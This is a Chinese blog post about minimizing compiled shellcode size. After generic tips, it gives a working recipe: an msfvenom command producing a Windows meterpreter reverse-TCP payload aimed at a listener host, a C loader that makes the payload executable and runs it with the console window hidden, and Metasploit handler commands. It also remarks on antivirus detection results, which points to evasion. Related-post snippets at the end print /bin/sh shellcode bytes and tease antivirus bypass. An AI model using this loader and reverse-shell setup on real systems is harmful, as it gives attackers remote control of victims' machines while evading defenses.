ShellCode 最小化编译优化

原创 已于 2023-11-16 15:27:49 修改 · 5.8k 阅读 · 0 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#windows #ShellCode #编译优化

于 2019-08-15 09:18:00 首次发布
本文探讨了在编写Shellcode时最小化其大小的多种优化技巧,包括指令调整、寄存器使用、压缩算法及避免库函数依赖等,旨在提高注入效率与隐蔽性。

编写Shellcode时,最小化大小通常是一个重要的优化目标,因为Shellcode通常被用于利用漏洞或执行特定任务,而且需要足够小以便于注入到目标进程中。以下是一些最小化Shellcode大小的一般性优化技巧:

  1. 手动调整指令: 手动调整指令以确保使用最小的字节数。例如,使用短格式的JMP指令,避免不必要的NOP指令等。

  2. 使用寄存器而不是内存: 尽可能使用寄存器而不是内存来保存数据。这减少了代码中的内存引用,从而减小了Shellcode的大小。

  3. 使用短指令: 在可能的情况下,使用短指令而不是长指令。例如,使用xor eax, eax而不是xor rax, rax

  4. 压缩Shellcode: 使用压缩算法(如LZ77)对Shellcode进行压缩。但要注意,解压缩代码会增加Shellcode的复杂性。

  5. 避免不必要的库函数: 避免使用标准库函数,因为它们可能包含大量的额外代码。手动实现所需功能,以减小Shellcode的体积。

  6. 删除不必要的部分: 删除不需要的功能或部分,以适应特定的攻击场景。

  7. 使用短标签和变量名: 使用短的标签和变量名,以减小Shellcode的大小。

  8. 优化循环: 对循环进行优化,尽量减小循环体的大小。

  9. 使用Shellcode编写工具: 使用专门的Shellcode编写工具,这些工具通常会自动应用各种优化技巧。

  10. 去除符号表和调试信息: 在编译时使用适当的选项(如-s)来删除符号表和调试信息,减小Shellcode的大小。

虽然上述技巧可以减小Shellcode的大小,但在实际使用中,需要权衡Shellcode的大小和功能。过度的最小化可能导致Shellcode变得难以理解和维护。此外,为了确保Shellcode的成功执行,还需要考虑目标系统的体系结构和操作环境。

1.生成ShellCode

[root@localhost ~]# msfvenom -a x86 --platform Windows \
>                              -p windows/meterpreter/reverse_tcp \
>                              -b '\x00\x0b' LHOST=192.168.1.30 LPORT=9999 -f c

2.替换ShellCode

#pragma comment(linker,"/INCREMENTAL:NO")                                     // 减小编译体积
#pragma comment(linker, "/section:.data,RWE")                                 // 启用数据段可读写
#pragma comment(linker,"/subsystem:\"windows\" /entry:\"mainCRTStartup\"")    // 隐藏控制台CMD窗体

#include <windows.h>
int main(void)
{
	char *buff = (char*)"此处填写ShellCode";
	DWORD ShellCode;

	BOOL ret = VirtualProtect(buff, strlen(buff),PAGE_EXECUTE_READWRITE, &ShellCode);
	if (!ret) { return EXIT_FAILURE; }
	((void(*)(void))buff)();
	return EXIT_SUCCESS;
}

3.MSF监听事件。

msf5 > use exploit/multi/handler
msf5 exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp
msf5 exploit(multi/handler) > set lhost 192.168.1.30
msf5 exploit(multi/handler) > set lport 9999
msf5 exploit(multi/handler) > exploit -j -z

打开VS新建一个项目,这里我们要选择控制台项目,然后选择空项目,将上面的对勾全部去掉。

粘贴并替换好,生成的ShellCode代码,然后编译代码,观察代码大小。

经过上方编译优化,大小从原来的70KB缩减至 10KB,查杀结果如下。

S.E.H中shellcode占用空间压缩
weixin_44723038的博客
11-26 301
实验环境:Windows 10,Microsoft Visual C++6.0,OllyDbg 实验原理:在上一次实验”在栈溢出中利用S.E.H“的基础上,改变shellcode的位置,从向下跳转改为向上回溯跳转,即将NS.E.H中的指令内容改为向上跳转。 实验代码:(其中构造的shellcode不同电脑不一样,需调试找到具体函数的地址) #include <windows.h> #i...
orw通用代码,最shellcode
azraelxuemo的博客
04-02 2403
文章目录
shellcode提取方法和测试【原创】
12-13
这是一个windows弹出对话框的shellcode,38个字节 在windows xp sp3下测试 已在vc++6,mingw,cygwin下编译测试
打造200字节的最通用ShellCode
木休的斋堂
03-14 2085
本篇文章源自《黑客防线》2007年4月刊 作者:王炜/ww0830 ShellCode,在保持对各个版本通用性的基础上,当然是越越好,这不仅仅是黑客艺术对简单美的追求,更重要的是有时候能利用的空间只有这么少。这不,这次我就遇到了长度限制只有210字节的情况。网上看了一下,属于比较ShellCode有“382 bytes bind port shellcode for win2k all
Shellcode转exe权限管理】:掌握最小权限原则,提升编译安全
[【Shellcode转exe权限管理】:掌握最小权限原则,提升编译安全](https://img-blog.csdnimg.cn/c42da0d3603947558f729e652dae1dbd.png) # 摘要 本文对Shellcode转exe过程中的权限管理进行了全面探讨,旨在通过最小...
cpp-跨架构的Shellcode编译
08-16
3. **编码优化**:为了最小化Shellcode的大小并提高执行效率,可能需要对生成的汇编代码进行优化,例如删除冗余指令,使用更的指令表示等。 4. **编码和打包**:将优化后的汇编指令编码为二进制机器码,并打包成...
最小环境下的汇编Shellcode开发指南
资源摘要信息:"the-shellcode-factory:汇编shellcode开发的最小环境" 该资源是一个专门用于Linux下汇编Shellcode开发的最小环境工具。"Shellcode"通常指的是一段可以在特定的计算机环境下执行的代码,经常被用在...
10、Socket Reusing Shellcode 技术解析
最新发布
whisky的博客
11-11 8
本文深入解析了Socket重用shellcode、文件描述符重用及shellcode编码三大安全攻防技术。通过实例分析,阐述了如何利用已建立的连接或打开的文件描述符实现高效漏洞利用,并介绍了多态shellcode的编码原理与实现方式。文章还对比了各类技术的应用场景,提出了相应的防御措施,并展望了未来攻防技术的发展趋势,为提升系统安全防护能力提供了理论支持和实践指导。
十六、Shellcode指令优化
wanhex的博客
03-10 1123
在上一篇的分享中,我们编写了一段使用execve系统调用执行/bin/sh命令的Shellcode: #include <stdio.h> // shellcode 指令数据 char sc[] = { "\x24\x06\x01\x11" "\x04\xd0\xff\xff" "\x24\x06\x00\x00" "\x27\xbd\xff\xe0" "\x27\xe4\x...
写精简的shellcode
农家小舍
09-30 1513
写精简的shellcode(译自:Writing Small Shellcode)信息来源:http://www.ngssoftware.com/文章作者:Dafydd Stuttard (daf[at]ngssoftware[dot]com)译文作者:fqucuo、wangweinoo1原作时间:应为05年左右译者声明:本人在https://forum.eviloct
linux我知道的最shellcode
fjh1997的博客
04-16 1865
长度19 xor eax, eax push eax push 0x68732f2f push 0x6e69622f xchg ebx, esp mov al, 0xb int 0x80 来源:https://www.exploit-db.com/exploits/40131
3个月的SHELLCODE研究成果-一个最简单的Shellcode
小发猫
10-28 3522
坚持到底,永不放弃。我终于写了个小小的SHELLCODE啦。就拿这个星期来说,我日思夜想,为什么我总写不出可以正确执行的SHELLCODE呢,非常郁闷,也整天板着脸想问题,差点吓着小MM同事了。我本来ASSEMBLY基础不是很好,只懂得可怜的几个INSTRUCTIONS,写SHELLCODE时碰到了很多不认识的Instructions。还要上网差资料,有时真的是一头雾水。我看了很多前辈写的SHEL
一段小的 shellcode 测试 代码
kerson的专栏
11-30 1286
<br /><br />int main() <br />{ <br />char shellcode[]=<br />"/xFC/x68/x6A/x0A/x38/x1E/x68/x63/x89/xD1/x4F/x68/x32/x74/x91/x0C"<br />"/x8B/xF4/x8D/x7E/xF4/x33/xDB/xB7/x04/x2B/xE3/x66/xBB/x33/x32/x53"<br />"/x68/x75/x73/x65/x72/x54/x33/xD2/x64/x8B/x5A/x30/x8
shellcode
snowleopard_bin的博客
08-10 1688
shuallcode shellcode='\x48\x31\xff\x48\x31\xf6\x48\x31\xd2\x48\x31\xc0\x50\x48\xbb\x2f\x62\x69\x6e\x2f\x2f\x73\x68\x53\x48\x89\xe7\xb0\x3b\x0f\x05' 64bit local /bin/sh 有时遇到写的字符中不能包含'\x0b'这个字符,因此不能...
【0day shellcode编写艺术】—— jmp esp、动态获取api。后续:编码、压缩
desword-- 技术,杂文。
12-11 2894
此次主要徒手体会了一下编写shellcode 的不容易。当真不容易,看着作者的代码,都感觉自己无处可以下手了。 需要的底层原理知识也还挺多需要补充上去的。 打算后期再逐渐补充。目前阶段将jmp esp弄懂了。后面动态获取api在主机上出错了。问题和搜索jmp esp代码时候貌似一样,产生访问越权的问题。后期再继续解决吧。 目前整理一下整个的思路。 1、shellcode、expoit的概念;
手把手简易实现shellcode及详解
3-Number
06-22 6754
转载理由: 处于安全行业靠边产业,经常听和看到shellcode,但是只有模糊的认识,于是学习一把,毕竟C和汇编了解,开阔下视野; 转载于:http://blog.nsfocus.net/simple-realization-hand-handle-shellcode-detailed-explanation/?utm_source=tuicool&utm_medium=referral
python编写shellcode_免杀 - shellcode简单混淆BypassAv
weixin_32539505的博客
02-10 1873
前言在进行渗透测试过程中,往往会遇到主机有杀软,导致我们的木马被查杀,那么我们就得想办法绕过杀软进行上线Cobalt strike 或者 Metasploiit环境: Cobalt strike 4.1 Python pyinstaller何为shellcode?百度百科是这样介绍它的:“shellcode是一段用于利用软件漏洞而执行的代码,shellcode为16进制的机器码,因为经常让攻击者获...
[GDOUCTF 2023]Shellcode 全网最详细write up
qq_41937545的博客
11-02 1250
64 位 较shellcode -> 23 字节 \x48\x31\xf6\x56\x48\xbf\x2f\x62\x69\x6e\x2f\x2f\x73\x68\x57\x54\x5f\x6a\x3b\x58\x99\x0f \x05】​。32 位 字节 shellcode -> 21 字节 \x6a\x0b\x58\x99\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x31\xc9\xcd\x80。并且没有后门没有system。
评论
成就一亿技术人!
拼手气红包6.0元
还能输入1000个字符
 
红包 添加红包
表情包 插入表情
表情包 代码片
 条评论被折叠 查看
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

微软技术分享

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值